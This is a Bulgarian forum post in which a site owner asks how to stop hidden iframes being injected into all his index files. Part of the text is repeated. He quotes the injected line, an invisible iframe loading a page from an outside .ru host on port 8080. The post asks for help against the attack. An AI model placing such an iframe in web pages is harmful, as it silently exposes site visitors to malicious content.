rUMENcho
Registered
Здравейте. Ето какъв проблем имам. По някакъв начин в кода на сайта ми се слагат един много неприеятен ред
Това става във всичките index-ови файлове на сайта. През 2, 3 дена си проверявам компютъра за вируси, NOD32 казва, че е чист. Преди 2 дена смених и FTP клиента си, но продължат да се появява тези iframe-ове
и ми мажат сайта.
Някой има ли някаква идея как да ги оправя и повече да не се появяват, че взе да ми писва.
Благодаря
п.с. Не знам дали тази тема е за този раздел, но понеже е свързано с програмиране и затова реших да я пиша тук.
Код:
<iframe src="http://3cq.ru:8080/index.php" width=147 height=140 style="visibility: hidden"></iframe>
Това става във всичките index-ови файлове на сайта. През 2, 3 дена си проверявам компютъра за вируси, NOD32 казва, че е чист. Преди 2 дена смених и FTP клиента си, но продължат да се появява тези iframe-ове
Някой има ли някаква идея как да ги оправя и повече да не се появяват, че взе да ми писва.
Благодаря
п.с. Не знам дали тази тема е за този раздел, но понеже е свързано с програмиране и затова реших да я пиша тук.